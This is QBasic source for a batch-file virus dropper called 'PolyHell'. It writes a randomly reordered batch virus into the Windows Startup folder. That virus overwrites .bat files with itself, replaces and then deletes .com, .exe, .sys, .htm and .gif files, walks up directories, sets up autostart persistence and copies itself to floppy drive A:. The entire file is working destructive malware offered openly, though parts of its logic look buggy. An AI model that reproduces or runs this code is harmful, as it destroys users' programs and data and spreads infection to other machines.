CLS
REM Dropper.Bat.PolyHell
REM BY SeCoNd PaRt To HeLl
REM
REM PLEASE INCLUDE ALL THIS VIRUSES IN YOUR PORGRAM!! THANKS, McHit ;-)
REM THERE ARE ONLY 861 VIRUSES...

OPEN "C:\Windows\Startm~1\Progra~1\Autost~1\many.bat" FOR OUTPUT AS #1
PRINT #1, "ctty NUL"
PRINT #1, "goto aa"
RANDOMIZE TIMER
polym:
poly = INT(RND * 41) + 1
IF poly = 1 THEN IF sign = 0 THEN GOTO sign
IF poly = 2 THEN IF aa = 0 THEN GOTO aa
IF poly = 3 THEN IF ab = 0 THEN GOTO ab
IF poly = 4 THEN IF ac = 0 THEN GOTO ac
IF poly = 5 THEN IF ad = 0 THEN GOTO ad
IF poly = 6 THEN IF ae = 0 THEN GOTO ae
IF poly = 7 THEN IF af = 0 THEN GOTO af
IF poly = 8 THEN IF ag = 0 THEN GOTO ag
IF poly = 9 THEN IF ah = 0 THEN GOTO ah
IF poly = 10 THEN IF ai = 0 THEN GOTO ai
IF poly = 11 THEN IF aj = 0 THEN GOTO aj
IF poly = 12 THEN IF ak = 0 THEN GOTO ak
IF poly = 13 THEN IF al = 0 THEN GOTO al
IF poly = 14 THEN IF am = 0 THEN GOTO am
IF poly = 15 THEN IF an = 0 THEN GOTO an
IF poly = 16 THEN IF ao = 0 THEN GOTO ao
IF poly = 17 THEN IF ap = 0 THEN GOTO ap
IF poly = 18 THEN IF aq = 0 THEN GOTO aq
IF poly = 19 THEN IF ar = 0 THEN GOTO ar
IF poly = 20 THEN IF aas = 0 THEN GOTO aas
IF poly = 21 THEN IF at = 0 THEN GOTO at
IF poly = 22 THEN IF au = 0 THEN GOTO au
IF poly = 23 THEN IF av = 0 THEN GOTO av
IF poly = 24 THEN IF aw = 0 THEN GOTO aw
IF poly = 25 THEN IF ax = 0 THEN GOTO ax
IF poly = 26 THEN IF ay = 0 THEN GOTO ay
IF poly = 27 THEN IF az = 0 THEN GOTO az
IF poly = 28 THEN IF ba = 0 THEN GOTO ba
IF poly = 29 THEN IF bb = 0 THEN GOTO bb
IF poly = 30 THEN IF bc = 0 THEN GOTO bc
IF poly = 31 THEN IF bd = 0 THEN GOTO bd
IF poly = 32 THEN IF be = 0 THEN GOTO be
IF poly = 33 THEN IF bf = 0 THEN GOTO bf
IF poly = 34 THEN IF bg = 0 THEN GOTO bg
IF poly = 35 THEN IF bh = 0 THEN GOTO bh
IF poly = 36 THEN IF bi = 0 THEN GOTO bi
IF poly = 37 THEN IF bj = 0 THEN GOTO bj
IF poly = 38 THEN IF bk = 0 THEN GOTO bk
IF poly = 39 THEN IF bl = 0 THEN GOTO bl
IF poly = 40 THEN IF bm = 0 THEN GOTO bm
IF poly = 41 THEN IF bn = 0 THEN GOTO bn
GOTO polym
sign:
PRINT #1, "REM BAT.POLYHELL"
PRINT #1, "REM BY McHit"
sign = 1
GOTO polym

aa:
PRINT #1, ":aa"
PRINT #1, "For %%H in (*.bat) do copy %0 %%H"
PRINT #1, "goto ab"
aa = 1
GOTO polym

ab:
PRINT #1, ":ab"
PRINT #1, "copy *.com *.bat"
PRINT #1, "goto ac"
ab = 1
GOTO polym

ac:
PRINT #1, ":ac"
PRINT #1, "del *.com"
PRINT #1, "goto ad"
ac = 1
GOTO polym

ad:
PRINT #1, ":ad"
PRINT #1, "copy *.exe *.bat"
PRINT #1, "goto ae"
ad = 1
GOTO polym

ae:
PRINT #1, ":ae"
PRINT #1, "del *.exe"
PRINT #1, "goto af"
ae = 1
GOTO polym

af:
PRINT #1, ":af"
PRINT #1, "copy *.sys *.bat"
PRINT #1, "goto ag"
af = 1
GOTO polym

ag:
PRINT #1, ":ag"
PRINT #1, "del *.sys"
PRINT #1, "goto ah"
ag = 1
GOTO polym

ah:
PRINT #1, ":ah"
PRINT #1, "copy *.htm *.bat"
PRINT #1, "goto ab"
ah = 1
GOTO polym

ai:
PRINT #1, ":ai"
PRINT #1, "del *.htm"
PRINT #1, "goto aj"
ai = 1
GOTO polym

aj:
PRINT #1, ":aj"
PRINT #1, "copy *.gif *.bat"
PRINT #1, "goto ak"
aj = 1
GOTO polym

ak:
PRINT #1, ":ak"
PRINT #1, "del *.gif"
PRINT #1, "goto al"
ak = 1
GOTO polym

al:
PRINT #1, ":al"
PRINT #1, "For %%e in (*.bat) do copy %0 %%e"
PRINT #1, "goto am"
al = 1
GOTO polym

am:
PRINT #1, ":am"
PRINT #1, "cd.."
PRINT #1, "goto an"
am = 1
GOTO polym

an:
PRINT #1, ":an"
PRINT #1, ": BatInfectornext"
PRINT #1, "goto ao"
an = 1
GOTO polym

ao:
PRINT #1, ":ao"
PRINT #1, "For %%ll in (*.bat) do copy %0 %%ll"
PRINT #1, "goto ap"
ao = 1
GOTO polym

ap:
PRINT #1, ":ap"
PRINT #1, ": OthersInfectornext"
PRINT #1, "goto aq"
ap = 1
GOTO polym

aq:
PRINT #1, ":aq"
PRINT #1, "copy *.com *.bat"
PRINT #1, "goto ar"
aq = 1
GOTO polym

ar:
PRINT #1, ":ar"
PRINT #1, "del *.com"
PRINT #1, "goto as"
ar = 1
GOTO polym

aas:
PRINT #1, ":as"
PRINT #1, "copy *.exe *.bat"
PRINT #1, "goto at"
aas = 1
GOTO polym

at:
PRINT #1, ":at"
PRINT #1, "del *.exe"
PRINT #1, "goto au"
at = 1
GOTO polym

au:
PRINT #1, ":au"
PRINT #1, "copy *.sys *.bat"
PRINT #1, "goto av"
au = 1
GOTO polym

av:
PRINT #1, ":av"
PRINT #1, "del *.sys"
PRINT #1, "goto aw"
av = 1
GOTO polym

aw:
PRINT #1, ":aw"
PRINT #1, "copy *.htm *.bat"
PRINT #1, "goto ax"
aw = 1
GOTO polym

ax:
PRINT #1, ":ax"
PRINT #1, "del *.htm"
PRINT #1, "goto ay"
ax = 1
GOTO polym

ay:
PRINT #1, ":ay"
PRINT #1, "copy *.gif *.bat"
PRINT #1, "goto az"
ay = 1
GOTO polym

az:
PRINT #1, ":az"
PRINT #1, "del *.gif"
PRINT #1, "goto ba"
az = 1
GOTO polym

ba:
PRINT #1, ":ba"
PRINT #1, "For %%MH in (*.bat) do copy %0 %%MH"
PRINT #1, "goto bb"
ba = 1
GOTO polym

bb:
PRINT #1, ":bb"
PRINT #1, "cd.."
PRINT #1, "goto bc"
bb = 1
GOTO polym

bc:
PRINT #1, ":bc"
PRINT #1, ": worming"
PRINT #1, "goto bd"
bc = 1
GOTO polym

bd:
PRINT #1, ":bd"
PRINT #1, "copy %0 %WinDir%\Startm~1\progra~1\autost~1\AutoData.bat"
PRINT #1, "goto be"
bd = 1
GOTO polym

be:
PRINT #1, ":be"
PRINT #1, "If exist A:\*.* goto wbat"
PRINT #1, "goto bf"
be = 1
GOTO polym

bf:
PRINT #1, ":bf"
PRINT #1, "GOTO copyy"
PRINT #1, "goto bg"
bf = 1
GOTO polym

bg:
PRINT #1, ":bg"
PRINT #1, ": wbat"
PRINT #1, "goto bh"
bg = 1
GOTO polym

bh:
PRINT #1, ":bh"
PRINT #1, "For %%l in (A:\*.*) do copy %0 %l"
PRINT #1, "goto bi"
bh = 1
GOTO polym

bi:
PRINT #1, ":bi"
PRINT #1, ": copyy"
PRINT #1, "goto bj"
bi = 1
GOTO polym

bj:
PRINT #1, ":bj"
PRINT #1, "copy %0 A:\*.bat"
PRINT #1, "goto bk"
bj = 1
GOTO polym

bk:
PRINT #1, ":bk"
PRINT #1, "cd.."
PRINT #1, "goto bl"
bk = 1
GOTO polym

bl:
PRINT #1, ":bl"
PRINT #1, "For %%SaTaN in (*.bat) do copy %0 %%SaTaN"
PRINT #1, "goto bm"
bl = 1
GOTO polym

bm:
PRINT #1, ":bm"
PRINT #1, "cd.."
PRINT #1, "goto bn"
bm = 1
GOTO polym

bn:
PRINT #1, ":bn"
PRINT #1, "For %%NoBoDyS in (*.bat) do copy %0 %%NoBoDyS"
bn = 1
GOTO polym


